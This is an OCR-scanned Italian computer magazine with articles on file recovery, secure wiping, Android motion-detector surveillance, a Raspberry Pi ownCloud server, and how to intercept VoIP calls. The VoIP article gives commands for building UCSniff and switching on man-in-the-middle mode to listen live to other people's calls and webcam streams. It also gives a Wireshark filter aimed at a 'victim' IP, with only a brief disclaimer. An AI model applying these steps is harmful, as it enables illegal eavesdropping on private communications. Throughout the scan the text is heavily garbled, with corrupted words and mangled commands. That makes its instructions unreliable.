bito, infatti, abbiamo ancora ottime possibilità 
di recuperare buona par le dei uost ri dati, se non 
tutti. Con un programma come Recuva bastano 
pochiclic perripristinarenon solofilecancellati 
accidentalmente, ma and)e quelli danneggiati 
0 comunque non piti riconosciuti da Windows, 
E non solo da memory card e hard disk, ma 
da qualsiasi periferica di memorizzazione. 
Vediamo come usarlo al meglio. 


Wizard di Recuva 


Benvenuto nel Wizard di Recuva 


Questo wizard t» aiAria a recuperare i tuoi Se Lamellati 
Rapordi ó porre tf trpta domerò? e Recuva fora à resto 

Se pretenso non .sare questo r'tzad, orsm Anrufta per 
accedere ale funron avanzate d Rea va. 


Ijon mostrare Wizad alfa vve 


Avana > 


Saltiamo il wizard del programma 

B Installato Recuva, al primo avvio visualizzeremo una schermata da cui è 
possibile eseguire il recupero dei tile mediante una procedura guidata 
Giochiamo Annulla per caricare l'interlaccia standard che consente di 
scegliere ogni impostazione per recuperare piu file possibili. 
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Ecco il pannello principale 

B Dal menu a tendina in alto a sinistra selezio¬ 
niamo I trita di archiviazione dalla quale desi¬ 
deriamo recuperare le foto o i dati cancellati 
Se abbiamo collegato la fotocamera al PC e non siamo 
sicuri del nome assegnato alla memoria interna, sce¬ 
gliamo la voce Tutti drive, 


Che tipi di file cerchiamo? 

t Se dobbiamo recuperare solo immagini, sele¬ 
zioniamo la vece Immagini ré menu a tendi- 
I na Nome file o Percorso in alto a destra 
faciliteremo cosi il compito a Pecuva, che punterà solo 
a questo tipo di file. Per corcare vari tipi di filo, selezio 
marno Documenti, 


Per i casi più disperati 

a Se il recupero dei dati è critico, attiviamo le 
impostazioni avariate. CBcchiamo su Opzio- 
ni, nella nuova schermata ne! tabAzrón/spun- 
tiamo tutte le voci della sezione Scansionee diamo OK 
La ricerca sarà più lenta, ma saranno iipristtnate anche 
le cartelle e la struttura dei lile. 



Procediamo co n la scansione 

Cucchiamo Scansione e lasciamo che Recuva 
faccia il suo lavoro II tempo di ricerca varia in 
base alle impostazioni scelte, alia dimensione 
dell unità di memorizzazione e al numero di file persi. 
Su una memoria Secure Digital il tempo richiesto sara 
di qualche minuto al massimo. 



Ecco tutti i file persi! Le operazioni di recupero 

B AI termine potremo vedere nella finestrati Fig^Selezioniamo lutti i file ri levati ria Recuva lanche 
Recuva il nome delle immagini trovate, per le ^Jquelii col bollino rosso, sebbene il loro recu- 
quali è disponibile anche l’anteprima, il colore mmm pero sia difficile) e cucchiamo Recupera, in 
associato a ogni foto indica la possbilità del recupero alternativa selezioniamo cd tasto destro uno dei file e 

effettivo: verde significa ottima, arancio accettabile e cucchiamo Recupera selezionali Scegliamo la cartel- 

rosso indica un file difficilmente recuperabile. la in cui archiviare i tile e diamo OK 


COSÌ VENGONO RECUPERATI I FILE CANCELLATI DAL DISCO 



Tutti itile memorizzati in undispositivodiarchiviazione dei file (la cui struttura varia a seconda del file System, 
di massa, sia esso un hard disk o una pendrive USB, FAT, FAT32 o NTFS, con cui è stato formattato il disposi 
vengono elencati in una tabella logica di allocazione tivo), utilizzata poi dal sistema operativo per caricare i 

dati. Quando un file viene cancellato, 
esso è ancora presente sul supporto, 
ma non risulta più elencato in questa 
tabella. Anche con la formattazione 
veloce i dati non vengono cancellati 
dai supporto, ma semplicemente 
viene riscritta la tabella, cosicché lo 
spazio occupato da ogni file risulta 
essere disponibile per altri dati (la 
formattazione lenta invece cancella 
fisicamenteifi!e,chequindfnon pos¬ 
sono essere più recuperati). 


RECUPERO SENZA TABELLA 

Le applicazioni di recupero dati, inve¬ 


ce, usano metodi particolari per leggere i settori dei 
supportodi memorizzazione, indipendente mente da 
quanto scritto nella tabella di allocazione dei file Anche 
se un file non viene più rilevato da Windows, perche 
non presente nella tabella,esso può essere recuperato 
da un programma come Recuva, a patto che non sia 
stato sovrascritto da altri file e che il supporto non sia 
stato formattato. Ecco perché è utile avere un tool di 
recupero sempre a portata di mano ed e importan¬ 
tissimo avviare le operazioni di recupero appena ci 
accorgiamo di aver cancellato un file. Continuando ad 
utilizzare una memoria di massa rischieremmo, infatti, 
di cancelare noi stessi, per sempre, i nostri dati. Meglio, 
quindi, installare subito un software di recuperodati e 
tenerlo sempre pronto ad intervenire. Naturalmente 
questi tool nulla possono nei casi in cui l'hard disk è 
fisicamente danneggiato: in questi casi si può ricorrere 
solo a ditte specializzate. Ma a che prezzo! 
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AshampooFileWiper | 


I 



Eseguiamo ri nstallazione 

“ i Scompattiamo l’archivio AshampooFileWi- 
per.zp prese nte nellimertaccia Principa- 
_J le del CO - Rom ed eseguiamo il file esegui¬ 
bile che troviamo al suo interno Seguiamo la pro¬ 
cedura guidata e al termine dell installazione pre 
mìamo il pulsante Fine. 


Cosa ci 
occorre \ « 

TOOL 01 

OAfCELLAZIOtJE [IATI 

ASHAMPOO 
FILE WIPER 

vco 

Software compiate' 


S iamo sicuri che quando cancelliamo 
un file dal disco rigido o da qualsiasi 
altra unità di memorizzazione questo 
non possa essere recuperato da qualche 
malintenzionato che cerca di vuole carpire 
informazioni riservate o dati sensibili? 
Invero, adoperando programmi facilmente 
reperibili in Rete chiunque può riuscire a 
recuperare i file (documenti, immagini, 
presentazioni, ecc.) che noi stessi abbia¬ 
mo eliminato. Per questo motivo, in par¬ 
ticolare se stiamo pensando di vendere 
un computer, una chiavetta USB o una 
mmmory card o se questi dispositivi oltre 
che da noi sono usati da altre persone, è 
bene cancellarli in maniera definitiva. 
Per tarlo possiamo utilizzare un software 
come Àshampoo File VViper, che con po¬ 
chi semplici clic del mouse ci consente di 
eliminare ogni traccia dei file cancellati 
ìinpendendone il recupero. Vediamo subito 
come procedere. 


ASHAMPOO" SETUP 




■fl 


Dati cancellati 
per sempre! 

Scoprì come eliminare in maniera 
definitiva file e cartelle e renderne 
impossibile il recupero 
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l oies- inì mww iirrawi '/mmì’ iiv 


✓ 



✓ 

— 



—~_ 


1 l 

- >«l»- •- 


—— 


Richiediamo iLcodice 

B Avviamo il software con un doppio clic 
sul link presente sul desktop. Nella fine¬ 
stra che compare cicchiamo su Rìchie 
di la chiave GRATUITA per la versione comple¬ 
ta. Nella pagina Web di registrazione che si apre 
digitiamo la nostra e-mail e cicchiamo su Richie¬ 
di chiave per versione completa. 


Copiamolo n egli appunti 

Se siamo g ià registrati sul sito Ashampoo 
i(se così non fosse, ci verrà chiesto di 
4M? creare un nuovo account) inseriamo la 
nostra password e clicchiamo su Accedi Verrà 
mostrato a video il codice di registrazione (rice¬ 
veremo un'e-mail con tutte le informazioni): 
copiamolo con Ctrl+C 



Prima pensiamo ai file... 

a L interfaccia principale di Ashampoo File 
Wiper è molto semplice e ben organizza¬ 
ta. Per aggiungere un file all’elenco di 
quelli da cancellare facciamo clic sul pulsante in 
alto File , individuiamo e selezioniamo uno o più 
elementi da eliminare (tenendo premuto Ctrl). 
quindi facciamo clic sul tasto Apri. 


...Poi alte cartelle e al cestino 

Per le cartelle procediamo in modo simi- 
. le a quanto visto finora per i file Cucchia¬ 
mo in alto sul pulsante Cartella, selezio¬ 
niamo la directory da cancellare definitivamente 
e premiamo OK Per svuotare in modo sicuro 
anche il contenuto del cestino di Windows tac¬ 
ciamo clic sul pulsante Cestino. 



Attiva im tua versione completa e gratuita ora! 

H4§»5(Ktv tm t*mn* MiwantMi* copsn «**£■ «ara rifa 

far*** » <tm ve fnM* per mi«M) or* • Wfc «I 

«Ir«olcM hcNedi li cMe* GMTVTA pr» I* eerpion 




ennio m mvmn r* Kmu fr 

u *•*»■« uia»»K*«w 



i ùoù 




Attivazione eseguita! 

a Ritorniamo nella schermata di installa 
zione di Ashampoo File Wiper, incolliamo 
Il codice seriale nell’apposito box facen¬ 
do clic sul pulsante Incolla dagli appunti Pre 
miamo Quindi Attiva ora per attivare la versione 
compieta del software e poi Continua per com¬ 
pletare l'operazione. 




izione definitiva! 

ossiamo anche programmare la cancella 
| zione dello spazio libero su una partizione. 
Penarlo cucchiamo su Spazio libero dispo- 
nibilee selezioniamo la partizione. Completato l'elen¬ 
co, cicchiamo su Distmggi por eliminare lutto deh 
nitivamente e confermiamo con Si A cancellazione 
avvenuta premiamo OK 


WiPING: ECCO COSA SIGNIFICA ELIMINARE DATI IN MODO SICURO 


Quando eliminiamo un file presente sul disco rigido, 
in una memory card o in una chiavetta USB, esso 
finisce nel cestino di Windows, ma può essere ancora 
ripristinato con un die del mouse. Se però svuotiamo 
il cestino o eliminiamo direttamente il file senza 
farlo passare da esso utilizzando la combinazione 
di tasti Shift+Canc, cosa succede? Invero, anche se 
Esplora Risorse non lo rileva più, il file non è stato 
eliminato definitivamente, ma è stato solo rimosso 
dalla tabella di allocazione del file System, un indice 
in cui sono specificati i settori (duster) dell hard disk 
occupati dai file. I dati eliminati continuano cosi ad 
essere presenti sull'unità e possono essere ancora 
recuperati utilizzando appositi tool come Recuva 


(presente nella sezione Antivirus&Sicurezza del 
Win CD-Rom). Poiché lo spazio su disco occupato 
dai file eliminati èconsiderato libero dal computer, 
il loro recupero può essere effettuato solo se ì set 
tori da essi occupati non vengono nel frattempo 
sovrascritti da nuovi file. Viceversa, questo significa 
che chiunque acceda a nostra insaputa ai PC, può 
riuscire a recuperare totalmente o parzialmente i file 
che credevamo di aver cancellato. Per evitare ciò è 
necessario servirsi di software come Asha'mpoo File 
Wiper in grado di eseguire un'operazione chiamata 
“wiping“che consiste nel sovrascrivere più volte i 
settori del discoprecedentemente occupati dai file 
con altri dati, nulli o generati in modo casuale, in 



modo da rendere molto difficoltoso o addmttura 
impossibile il recupero delle informazioni origina 
riamente memorizzate. Infatti maggioreè il numero 
di sovrascritture dei settori, minore è la possibilità 
di riuscire a recuperare, anche solo in parte, i dati in 
essi memorizzati 
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Videosorveglianza 
con lo smartphone 



Con un’app gratuita e un vecchio 
telefonino Android installi in casa 
un pratico sistema anti-intrusione! 
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C apila un po’ a unti di fare qualchegita 
fuori porta e di abbandonare, anche 
se solo per qualche ora o un'intera 
giornata, la propria abitazione. Una casa 
lasciata incustodita però, si sa, può divenire 
facile presa di ladri e lestofanti che, appro¬ 
fittando della nostra assenza, possono in¬ 
trufolarsi in essa e svaligiarla. Poiché, come 
dice un famoso adagio, “prevenire è meglio 
che curare", è sempre bene mettere in atto 
opportune contromisure (porte blindate, 
antifurto, videocamere, ecc.) die ci evitino 
spiacevoli sorprese al nostro rientro. L'ado- 
zj^ne di tali soluzioni spesso però comporta 
'-‘ •'esa di centinaia (se non migliaia) di euro, 
senza sputare che nella maggior parte dei 
fallare complessi antifurti vuol dire 
intervenire, anche in maniera importante, 
su impianti elettrici già esistenti, porte e 
finestre e richiede l’intervento di costosi 
tecnici specializzati. 

Una soluzione fai da te 

Se non abbiamo la possibilità economica di 
“blindare’’ la nostra abitazione, possiamo 
or'tentarci verso soluzioni decisamente meno 
costose, ma altrettanto efficaci. Se, ad esem¬ 
pio, possediamo un vecchio smartphone 
Android, configli randolo in maniera oppor¬ 
tuna possiamo utilizzarlo come una vera e 
propria videocamera di sorveglianza. Per 
farlo basta adoperare un dispositivo dotato 
d i connessione Wi-Fi e fotocamera (anche da 
pochi Megapixel), un router Wi-Fi e, ovvia¬ 
mente, una connessione fiat ad Internet. Non 
dovremo fare altro, infatti, cheinstallare sul 
nostra vecchio smartphone Motion Detector 
Pro, un’app gratuita che attivi la videocamera 
del dispositivo e che, in caso di rilevazione di 
un movimento all’interno dell’abitazione, ci 
invii una e-mail contenente la foto scattata. 
Vediamo subito come fare. 












Motion Detector Pro I Software 
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Motion Detector 

Setti ngs 

Change thè settings of thè motion 
detector 



Scarichiamo il software 

Andiamo su Google Play, (occhiamoci con 
il nostroaccountedigiliamo Motion Detec¬ 
tor Pro nel campo di ricerca. Raggiunta la 
pagli a dell'app controlliamo che sia compatibile 
con il nostro dispositivo. Clicchiamo quindi su Instal¬ 
la per scaricare ! ’app e installarla sullo smartphone 


Un primo sguardo all’app 

Wm Una volta avviato Motion Detector Pro, pas¬ 
cli sando con il dito sulle icone dell'app pos- 
mm siamo usare il menu rotante che mette a 
disposizione l'help la pagina delle impostazioni il 
pulsante per eseguire la videosorveglianza e quello 
per effettuare una donazione allo sviluppatore 


A tu per tu con le impostazioni 

¥9 Cucchiamo sull’icona a forma di ingtanag- 
um gio peracceder&alle numerose imposta- 
mm zioni dell app. Tocchiamo Time between 
friggere per impostare l'intervallo di tempo che 
intercorrerà tra una cattura e I altra, è consigliabile 
impostarlo su 10 secondi. 


fr I 

Image setting* 


Q Number of triggers ^ 

SD card Storage 


r 

Ttorethe sumeri lance ^mages cn 

h 

1 time (òefault) • 

thè SD card 



Cloud Storage 


2 times 

Store surveillance images un thè 

RI 


cloud. WARNING: If voii disahle 


- - 

this you cannot receive ut sges! 



Enable remote startup 


Allow this app to te started up by 
SMS (send “alarmstart 
yourpasswc'rd" to this phone) 

a 

Password protection 

Prevents unauthcnzed remote 
startup of thè alarm 

© 


Surveillance fm»ges 



Quante volte s cattia mo ? 

a Nella successiva schermata possiamo 
impostare il numero di scatti da catturare 
in sequenza. Uno scatto solo può bastare, 
quindi lasciamo selezionata l’opzione 1 time (default). 
In questo modo il programma catturerà soltanto uno 
screenshot alla volta 


Salviamo gli screenshot 

È necessano ora abilitare il salvataggio deP 
le immagini catturate. Selezioniamo SD card 
s/orageper salvare le immagini sulla memo 
ry card del telefono. È importante selezionare anche 
Cloud Storage in questo modo saremo sempre 
sicun di ricevere via mail le immagini catturate 




fio anc he da remoto! 

J4.app permette di avviare la videosorve- 
Tgl anza da remoto grazie a un SWIS. Per 
tarlo basta inviare, al numero della scheda 
SIM presente nello smartphone il testo alarmstart 
TUAPASSWORD. dove TUAPASSWORDè la pas¬ 
sword che imposteremo in Password protection. 


Motion Detector $ 

Send survelllance Irnages tc 






Attiviamo la wideosorveql ianza 

B Selezioniamo l'icona a forma di obiettivo 
digitiamo l'indirizzo di posta elettronica su 
cui ricevere le notiliche e il numero di cel¬ 
lulare, e tappiamo su Start surveillance. Posizio¬ 
niamo il telefono su un piano, con la videocamera 
puntata verso l'ambiente da controllare e attacca¬ 
to alla presa elettrica 


Beccato l’intruso! 

Avviata l'app in modalità surveillance, lo 
smartphone attenderà il primo movimento 
nell'Inquadratura, per inviarci l'é’-mail o 
l'SMS a seconda delle impostazioni che abbiamo 
scelto. Come è possibile vedere nell’immagine, 
infatti, ha appena rilevato un “topo di laboratorio' 
all'interno della redazione. 


Controlliamo la posta 

a Da bravo ed efficiente sorvegliante, il nostro 
telefono cì invierà subito un messaggio di 
posta elettronica contenente il link da clic- 
care per visualizzare la foto appena scattata Le 
foto vengono raccolte sul sito dello sviluppatore, 
che crea per la nostra privacy, una chiave univoca 
per ogni scatto ricevuto. 
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L I avvento del VoIP ha segnato un grande 
9 passaggio nell’era di Internet Grazie 
a questo servizio è possibile effettuare 
telefonate in tutti i paesi del mondo a tariffe 
bassissime se non gratuita niente, direttamente 
dal PC o dallo smartphone, sfruttando la Grande 
Rete. Una domanda, però, nasce spontanea: 
dal momento che la Rete presenta delle “falle'’, 
siamo sicuri che le nostre chiamate VoIP non 
vengano intercettate? 

L’attacco Mairi thè middle 
mette a rischio la sicurezza 

Il rischio maggiore per una comunicazione VoIP 
è rappresentato dalla possibilità di intercetta 
rei paletti scambiati dai due interlocutori 
attraverso!;! tecnica del Maìn in thè middle. Si 
tratta ditin tipo di attacco nel quale i'hackerèin 
grado di leggere, inseri re o modificare messaggi 
tra le due parti senza che nessuna delle due si 
accorga che sia stata compromessa la sicurez¬ 
za dell’invio dei dati. L’attaccante deve essere 
in grado di osservare, intercettare c replicare 
verso la destinazione prestabilita il transito dei 
messaggi tra le due vittime. In sostanza l’hacker 
si pone in mezzo alla comunicazione tra i due 
interlocutori ed è quindi in grado di ascoltare la 
conversazione. I programma da utilizzare sono 
due: UCSniff e Wireshark. il primo permette 
anche di poter intercettare i Russi video delle 
webeam IP collegate alla Rete; il secondo è (orse 
il miglior sniffer di rete, poiché raccoglie qualsia¬ 
si dato chetransitisul Web, dai pacchetti I fTTP 
a quelli VoIP. Sebbene entrambe le applicazion i 
siano disponibili sia per Windows sia per Linux, 
èpreferibileusarleconilsistema del Pinguino, 
con una distribuzione come la Backtrack, pervia 
della limitazione hardware del primo sistema 
operativo, inoltre, è bene ricordare che è un reato 
penale intercettare le telefonate altrui, pertanto 
questa guida ha il solo scopo di mostrare alcune 
falle di questa tecnologia. 


Ecco come ascoltare e registrare 
le telefonate via Web sfruttando 
i bug della tecnologia 
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I driv er per l’intercettazione 

0 Prima di scaricare il file eseguibile, dobbiamo 
insta llaredei bacchetti daterminale Linux. Per 
farlo, digitiamo prima sudo apt-get upóate, 
apt-get instali tuiild essentiale in seguito guest pac- 
nhetti z/Mg-dw. liblzo2-de i/, iibpcap08-dev libnetl- 
dev. !ibasound2-dev ibbz2-dev digitando apt-get 
instali "nome pacchetto"in modo sequenziale. 


Scarichiamo l'applicazione 

a Installiamo anche i pacchetti libxt ì -dev hv- 
xext-dev Iibfreetype6-dez vice hbvic-dev, 
per avere una interfaccia grafica. Dalla sezio 
ne Antivirus & Srcwezzadel WEB DVD. scompattiamo 
il file UCSniff.zip e tramite il comando tar -zxvf 
itcsniff-3 20.largz creiamo la cartella ucsniff-3.20. 
Spostiamoci al suo interno con cd ucsniff-3.20 


Ulti mi passaggi 

Ora compiliamo il tutto con ../configure 
; -enadle-tibvie -enable-gui && make 
<StS make instali. Per quanto riguarda 
Wireshark, se non tosse già presente, possiamo 
installarlo scaricandolo dal sito del produttore, 
ovvero www.wireshark.org . 



Saltiamo i parametri corretti 

a Per avviare l'applicazione digitiamo da termi¬ 
nale il comando ucsnìff-G; si aprirà una 
schermata simile a quella in foto. Impostiamo 
la nostra periferica di rete che stiamo usando da Select 
Interface e spuntiamo la voce MitM: premendo i 1 
comando StartUCSniff, diamo ineio all operazione. 


Pronto, chi mi ascolta? 

a : A questo punto, spostiamoci nella scheda 
Active Calls (la quarta etichetta da sinistra) 
per riuscire a intercettare le chiamate che 
stanno avvenendo all’interno della rete locale. Sotto la 
voce Live Monitor, premendo il comando Start è pos¬ 
sibile ascoltare la chiamata! 


diventa pubb lica 

vogliamo visualizzare il flusso video ore- 
i sente nella rete, rimaniamo nella scheda 
Active Calls. ma in questo caso scegliamo i 
pacchetti video e premiamo sempre la voce Sfa/f per 
vedere cosa sta accadendo. Mediante il programma 
VLC, è possibile avere uno streaming in diretta! 
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Wireshark, il tut to fare! 

B Sebbene UCSnrtt richieda sPoalcum parame¬ 
tri per poter funzionare, una soluzione più 
semplice è quella di usare Wireshark. Si trat¬ 
ta di uno sniffer che raccogie tutti i dati che passano 
nella rete, tra cui le chiamate VolP. Per aprire l'applica 
zione basta digitare sudo wireshark da terminale. 


Fac ciamo partire la scansione 

a Una volta selezionata la periferica di rete che 
stiamo usando, etbO per la IAN, 'wlanO o 
mono per la WLAN digitiamo noi broadcast 
andnotmulticastandtìost "indirizzo IP della vidima ” 
in Capture filiere premiamo il comando Start per fa' 
partire la cattura video in streaming. 


Ora i protocolli SIP 

a Una volta terminata la scansione dei pacchet¬ 
ti catturali dalla rete locale, spostiamoci nella 
sezione in Statistics- VolP. Per ascoltare tutte 
le conversazioni che il software ha intercettato non 
dovremo fare altro che selezionare il file e cliccare su 
Player Incredibile ma verol 


































































Preoccupato che i dati nella cloud finiscano in mani 

sbagliate? Cosi crei una nuvola protetta da ogni attacco 

Mi faccio il mio 
cloud personale 

R aspberry Pi èilcomputerdall ingombro di una carta 
d i credito che da un paio d anni sta facendo la felicità 
di hackere smanettoni, grazie alla sua grande potenza 
(considerandole sue dimensioni) e alla versatilità d'utili z- 
zo. Cè chi lo usa coinè media center molto d iscreto (è così 
piccolo che si nasconde con molta facilità dietro la TV), eh i 
invece sfrutta la possibilità di i ateitacciaisi con il mondo 
esterno per gestire completi sistemi di home automation 
(la famosa demotica), magari totalmente fa# tu casa, e 
ancora c'è chi usa il Raspberry Pi come 'fulcro* «lei la sua 
rete casalinga utilizzandolo come NAS, server di stampa e 
stazione per il download. Queste sono soltanto alcune delle 
potenzialità offerte da questo piccolo grande dispositivo. 

Una nuvola personale 

Potremmo sfruttare le capacità del Raspherry Pi per 
mettere in piedi un completo sistema di cloud basato 

Q Prepariamo 


sulla nostra linea ADSLdi casa. Utilizzeremo il pacchetto 
ownCloud per avere sempre a disposizione tino spazio 
di Storage personalizzato di cui, anzitutto, possiamo 
decidere la capacità (essendo noi gli amministratori del 
sistema). In secondo luogo, e probabilmente è l'aspetto 
più importante, utilizzando il nostro personalissimo 
cloud potremo star certi che i dati che conserveremo 
su questo disco virtuale saranno sempre al sicuro da 
sguardi indiscreti, in quanto noi e soltanto noi (oppure, 
al più, altri utenti precedentemente autorizzati) avremo 
accesso diretto ai dati in questione che, tra le altre co¬ 
se# puiiuum criptare grazie ai potenti stmmenti di un 
altro softw are come Sicurpass. E per finire, renderemo 
lo Storage privato accessibile da qualunque parte del 
mondo (ovviamente pre-^a autenticazione) creando e 
configurando un dominio dinamico grazie al servizio 
NoIP. Scopriamo 

il nostro 



Cosa cl 
occorre 

j: GESTORE SPAZIO CLOUO ' 

OWNCLOUD 

ùa<!!V.')cr*T Gratuito 
: Sito Internet. 

www.ownclotid.org 

«IMI COMPUTER 

RASPBERRY PI B 

osta f 47,00 
: Sito internet: 

www.amazon.it 

SOFTWARE DI 
i’HGTEZIONE 

SICURPASS 

✓CD 

Software compieta il 
Sito Internet 

www.sicurpass.it 


Come prima cosa, dobbiamo configurare sul computer un Web Server necessario per collegarci al cloud privato 
realizzato con ownCloud. Niente di complicato: pochi passi e sarà tutto perfettamente funzionante. 



Un’installazione testuale 

■J • f Avviato il Raspberry Pi, apriamo un terminale 
cliccando sulla omonima icona presente nel 
desktop e digitiamo sudo apt-get instali apache2 
php5 ptip5-json php5-gd php5-sq!ite curi Iibcurl3 
Iibcurl3-clev php5-curl php5-common php-xml- 
parser sqlite. confermando le richieste del sistema 


▲ Molto più facile a farsi... 

2 Abbiamo cosi installato l'occorrente per il 
«à nostro progetto. Ravviamo il server Apache 
scrivendo sudo Service apache'2 restart nei termi - 
naie Per controllare che tutto funzioni, digitiamo 
http://localhost nel browser oppure, da un altro 
PC connesso alla LAN, http://IP.del.fìasperryPi. 


-a Otteniam o i per messi giusti 

3 Dal sito www.owncloud.org/install sc&\- 
chiamo ownCloud Da terminale «compatta 
mo I archivio con sudo tar -xjl owncloud-5.0.7.tar.bz2 
e copiamone il contenuto nel server Web [Passo Al) 
con sudo cp-r owncloud/var/www/ Quindi digita¬ 
rne sudoctìown -FI wm-óataiwmv-data/mVmv 
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01 II cloud è pronto all’uso 

Terminata l’installazione di ownCloud, siamo pronti a configurarlo secondo le nostre esigenze. Al termine, faremo 
anche qualche prova di upload per verificare che tutto funzioni correttamente. 



^ Effettuiamo il primo ac cesso 

"f | Col leghiamoci all'indirizzo http://IP.del. 

BaspberryPi/owncloud per visualizzare la 
pagina di acceso al sistema cloud. Creiamo un account 
di amministratore scegliendo un nome a nostro piaci¬ 
mento e ma password che sa molto sganasciamo 
invariati gli altri campi e dicctiamo Fui 



± Ad ognuno le sueapp 

4 | ownCloud permette di usare utili applica- 
zioni che ne migliorarlo e integrano le fun¬ 
zionalità. Cliccando in alto a destra, selezioniamo 
la voce Apps per visualizzare la lista di quelle già 
installate. Tra tutte, ricordiamoci di abilitare l’app 
antivirus cliccando a destra su Enable 



* Aggiungiamo nuovi utenti 

7 f Se vogliamo consentire l'accesso al cloud 
privato ai nostri amici e colleghi, cucchia¬ 
mo sul menu a tendina in alto a destra e quindi su 
Utenti. Digitiamo nome utente e password rispet 
tivamente nei primi due campi in alto a sinistra e 
colleghiamo il nuovo utente al gruppo desiderato. 


Div entiamo amministratori 

2 Dal menu a tendina in alto a destra selezo- 
niamo Admin. Verrà visualizzata una nuo¬ 
va schermata dalla quale, grazie al nostro account 
di amministratore, potremo indicare la dimensione 
massima in upload dei file, controllare se ci sono 
aggiornamenti di sistema e molto altro ancora. 



Musica in streaming. .. 

OwnCloud consente anche di effettuare lo 
- r streaming musicale dei file conservati sul¬ 
la nostra nuvola all'interno della cartella data In 
automatico, il sistema di gestione riconosce i bra¬ 
ni musicali e li elenca, ordinati per artista e album, 
nella sezione Musica presente sulla sinistra. 


^ Upload più corposi 

3 ] Di default, il server permette di uploadare 
•mmJ file con dimensione massima di 7 MB. Per 
modificare il valore apriamo un terminale e digitiamo 
nano/ete/php5/apeche2/php.ini. Cerchiamo le chia¬ 
vi upload_maxJitesize e post max size e modifi¬ 
chiamole indicando, ad esempio, il valore 200 MB. 



■ e imm agini in stile Picasa 

0 '"tei stessa cosa accade anche con le imma 
J gini. Il sistema le riconosce e le organizzi 
grazie all'app Gallery. Dopo aver copiato, in un qual 
siasi percorso, tutte le foto di cui vogliamo disporre 
clicchiamc Gallery. Potremo sfogliarle e, volendo 
anche condividerle con altri utenti. 



Carichiamo un file 

Q i Possiamo ora procedere con l'upioad di un 
tile per provare che tutto funzioni. Dall'inter¬ 
faccia principale di ownCloud cucchiamo sulla frec 
eia verso l'alto e selezioniamo un tile da una cartella 
sul PC, verificando che le sue dimensioni non supe¬ 
rino quella massima consentita (Passo B3\ 



Possiamo scaricare un file direttamente 
dalla home di ownCloud oppure condivider^ 
lo con uno o piu utenti precedentemente registrati. 
Selezionando il file, sulla destra comparirà un apposi¬ 
to menu contestuale. Possiamo inviare un link, impo¬ 
stare una password o mandare tutto via e-mail. 
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a Accessibile dall’esterno 

Il cloud privato funziona ma è accessibile soltanto dal nostro computer o dalla rete locale. Vediamo quindi come 
configurare un servizio Web che lo renda raggiungibile da qualsiasi PC collegato a Internet 


^ Senza indirizzo IP 

■| j Pur rendere accessibile dfclnternet il 
nostro spazio cloud, ancn®M^*^e- 
re un indirizzo IP statico, dobbiamo registi®^ 
al servizio Mo-lp. Su wm no-ip.com clicchif® 
Sign Up, compiliamo i campi richiesti e sceglie 
mo un nome da associare alla nostra macchina 
in Hostname. Confermiamo con Sign Up per rice¬ 
vere un’e-mail con un link di conferma. 


a I nstalliamo il dient 

2 f Dal terminale del Raspberry Pi digit ano il 
w* comando apt-get instalinoip2 per scon¬ 
care e installare il programma che si occuperà di 
Énjwnicare costantemente il nostro indinzzo IP 
ai server che gestiscono il servizio offerto da No 
lp te ijroceduri) è semplicissima: dovremo solo 
r sponde P^ yocbe domande che ci verranno 
fatte in fase di i 


il 


Ttitto funziona bene ! 

3 II servizio Mo-lp si avvia in automatico: 
” dobbiamo soltanto verificare che il nostro 
server sia raggiungibile dall'esterno Da una rete 
diversa dalla nostra (casa di un amico o uno 
smartphone connesso in 3G) digitiamo il nome 
a dominio scelto (nel nostro caso, http://w nma- 
gazine no ip.biz/owncloud) Se appare la pagina 
di ownCloud è tutto OK! 


OwnCloud come 


Ora che lo spazio cloud è raggiungibile anche via Internet, possiamo installare un Client sui nostri PC che ci permetta 
di sfruttarlo per sincronizzare file e cartelle, proprio come avviene con gli altri servizi simili. 




* Ec co il programma giusto 

■| i Colleghiamoci alla pagina http-//own 
mJ oloud.org/sync-chents e scarichiamo 
l'ultima versione del Client di ownCloud per Win¬ 
dows ciccando sul pulsante Download Latest. La 
procedura di installazione scorre senza problemi 
visto che ownCloud non porta con sé spyware o 
programmi simili. 


^ Client, ti pr esento il server 

2 \ Occorre quindi configurare il Client cosic- 
ché possa connettersi al server ownCloud. 
Individuiamo l’icona del programma nella systray 
e con il tasto destro del mouse selezioniamo Con¬ 
figura nel menu che appare. Indemanio l'indiriz¬ 
zo del nostro sistema, usemame, password e (Se¬ 
chiamo Next 


J La prima sincronizzazione 

Il Client crea automaticamente sul server 
la cartella clientsync nella quale conser¬ 
verà i contenuti da sincronizzare. La directory di 
default sul sistema Windows è C:/Users/nome 
utente/ownCtoud. Da ora in poi, ogni file copiato 
in questa cartella sara immediatamente sincroniz¬ 
zato con il server. 
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3 II cloud è anche criptato 

Grazie al programma gratuito Sicurpass, bastano pochi e semplici passi per rendere inaccessibili 
i file contenuti in una cartella archiviata nella nostra nuvola personale. Ecco come procedere. 




a Una cartella riservata 

"| Nella cartella predeliruta del nostro spazio cloud (Pas¬ 
so D3) cucchiamo col tasto destro dei mouse in un’area 
vuota e poi Nuovo/Cartella Diamole un nome digitandolo 
nell'apposita casella: ad esempio, Riservati. Premiamo Invio. 
Ecco creata la cartella che conterrà ili nrc.iWì«frati. 



m II lucch ett o digitale 

2 Avviamo Sicurpass (sezione Antivirus&Sicurezza del 
CD-Romi e dicchiamo Cifratura e compressione dei file 
o premiamo Shitt+F4 Verrà visualizzata la relativa finestra. Clic : 
chiamo Cifrare cartella nella finestra che appare selezioniamo 
la cartella Riservati e diamo OK 



Protezione in corso 

3 : Selezioniamo lAlgoritmo di cifratura che riteniamo più 
--—/ idoneo alle nostre esigenze (quelli a 256 bit sono un buon 
omoromesso). Scegliamo una Passiverai cigliandola anche in Ven- 
fica e avviamo il processo di cifratura premendo il tasto TAB. I nostr 
file sono ora inaccessibili se non da chi conosce la chiave segreta! 


Decriptiamo la cartella 

^ ì Per accedere nuovamente alla cartella cifrata con i dati 
■—w archiviati nel nostro spazio cloud è necessario ripetere i 
passi precedenti ciccando pero sul pulsante Decifrare cartella 
Una volta inserita la password di accesso è sufficiente premere 
MB oppure il pulsante Decifra file. 


GENERARE PASSWORD ROBUSTE CON BLiZZARD 


Durante la procedura di inserimento delle 
password per la cifratura di cartelle o file, 
Sicurpas aiuta l'utente ad immettere delle 
parole d'ordine estremamente compii 
cate che non possono essere attaccate 
con un programma di tipo'brute force” 
se non in tempi troppo lunghi e quindi 
improponibili. Il software dispone, infatti, 
di un potentissimo generatore di master 
key denominata Sicurpas Blizzard Al- 
gorithm c he può essere visualizzato tra¬ 
rr ite il primo pulsante a sinistra nel pan¬ 
nello di immissione. Quando si accede al 
